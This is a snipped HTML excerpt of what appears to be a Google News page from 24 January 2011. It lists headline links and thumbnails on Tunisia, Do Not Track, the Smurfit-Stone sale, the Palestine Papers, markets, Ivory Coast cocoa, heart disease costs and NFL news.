<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7" target="_blank" class="usg-AFQjCNHXjZjZZ9wZ1CQDlom-nLlng-eGZQ " id="MAA4AEgIUAFgAmoCdXM">Army Leader Guarantees Stability in Tunisia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/" target="_blank" class="usg-AFQjCNHRMMEdervYw4C3TrR4yaH527g-LA " id="MAA4AEgIUAJgAmoCdXM">Family of deposed Tunisian president reportedly flees to Canada</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGfbz26qP-4kIHs7Cs4zetWEFMGQg " href="http://www.reuters.com/article/idUSTRE70N4AE20110124" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd1p9S1P917IJX6_NsO7fub3yJQg " href="http://allafrica.com/stories/201101242014.html" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBQ6i08N55rvq2OZdEmGRrU9lJbg " href="http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIRtGWiZ24XajWlPE7P_ytLx4u3w " href="http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA " title="Zee News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA "> Zee News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGE1VkAeO99EDIU5V2VTdJDt90ETw " href="http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376185,00.asp" target="_blank" class="usg-AFQjCNGZP7c0Zl6lnVgm4bMy_QmQ4_9spA " id="MAA4AEgJUAJgAmoCdXM">Tracking Should Be Abolished</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMvJiGe2AX0noQzS6SakNvosEsRw " href="http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2Ail2CEz7JI11eKLrtWgI-nzRPQ " href="http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHmUD0OklmTxR-5BKg01tb_AruD4A " href="http://www.computerworld.com/s/article/9206061/Google_jumps_into_Do_Not_Track_debate_with_Chrome_add_on?taxonomyId=84" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA " title="Bizjournals.com"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA "> Bizjournals... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFJ_Gs52Mso4Rmc8202BGU0W2_L6Q " href="http://www.reuters.com/article/idUSTRE70N6Q420110124" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHfGkJgRqTwQFW4jGNECzdb_053bw " id="MAA4AEgKUAFgAmoCdXM">Smurfit Options Trades Raise Analyst Brows</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgKUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video: 
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " id="MAA4AEgLUAFgAmoCdXM">Palestinians Blast Leaked Mideast Peace Offers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgLUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcbaKFXcbVlD-hDAIqRt4Ui9VNrg " href="http://www.voanews.com/english/news/middle-east/Palestinian-Leaders-Dispute-Leaked-Documents---114484609.html" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.moneycontrol.com/news/international-results/dow-sp-edge-lower-f5-earnings-hurt-nasdaq_515106.html" class="usg-AFQjCNH3iX1ZBGvSzzZesTRG42m5brg5Cw " title="Moneycontrol.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/UkW8kFz-O4CJKM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.moneycontrol.com/news/international-results/dow-sp-edge-lower-f5-earnings-hurt-nasdaq_515106.html" class="usg-AFQjCNH3iX1ZBGvSzzZesTRG42m5brg5Cw "> Moneycontro... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNH7-rWlccEq7cwEKGNCX6a9uJMRNQ " href="http://online.wsj.com/article/BT-CO-20110124-714008.html" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2420802420110124" target="_blank" class="usg-AFQjCNGoGQVkZN2q9DGMTfSiaeUQq4RieQ " id="MAA4AEgMUAFgAmoCdXM">US STOCKS-Wall St rises on renewed earnings optimism</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.marketwatch.com/story/us-stocks-cheer-intel-buyback-ma-2011-01-24?reflink=MW_news_stmp" target="_blank" class="usg-AFQjCNGIeomnqVSxdru4h94biZmHu5ir1Q " id="MAA4AEgMUAJgAmoCdXM">U.S. stocks cheer Intel buyback, M&A</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEYcn6V7dlmKxgqNQuPFpnia4b7nA " href="http://www.dailyfinance.com/story/investing/dow-rallies-on-tech-stocks-next-stop-12-000/19813156/" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG0Til1etlK6LHkupuK74ArvlipkQ " href="http://www.businessweek.com/ap/financialnews/D9KUNG1O2.htm" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3LWFcRVznuDaTqyxh6O7A466PnA " href="http://www.monstersandcritics.com/news/business/news/article_1614222.php/US-stocks-start-week-with-gains" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110124/ivory-coast-110124/" class="usg-AFQjCNGJnAXHtEGipcPqMRnlYCUI4huEBA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/XOGGS4W8bp8xCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110124/ivory-coast-110124/" class="usg-AFQjCNGJnAXHtEGipcPqMRnlYCUI4huEBA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgNUAFgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgNUAJgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgOUAFgAmoCdXM">Lowering BP Can Help Cut Women's Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgOUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgOUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&srvc=rss" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgPUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgPUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgQUAFgAmoCdXM">Twitter's Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgQUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/N_5JZv88v78-mM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video: 
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgRUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGQGgM5czT5R6B-ddNymghkSc-UmA " href="http://www.nesn.com/2011/01/charles-woodson-packers-send-barack-obama-a-message-after-nfc-championship.html" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video: 
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgSUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgSUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ " title="New York Times (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/1q0LPLp7fAUbbM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&campaign=rss&source=NFLHeadlines" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video: 
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/AP08eefa0c9e844584a494106fb21688b5.html" target="_blank" class="usg-AFQjCNFbJ1uuza5woqRu_iLy2zuvPb41xw " id="MAA4AEgTUAFgAmoCdXM">Rex Ryan still feeling Super about Jets' future</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" id="MAA4AEgTUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTsAZ0TgzKZ399uC9seSOMhzGZ4w " href="http://nfl.fanhouse.com/2011/01/24/afc-nfc-championship-games-continue-nfls-tv-ratings-boon/" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF9C8wL3fOFsYTsgaPRXS8A3ltpVg " href="http://www.nfl.com/news/story/09000d5d81de420a/article/conference-title-games-garner-best-tv-ratings-in-14-years" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg " title="ABC News"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgUUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
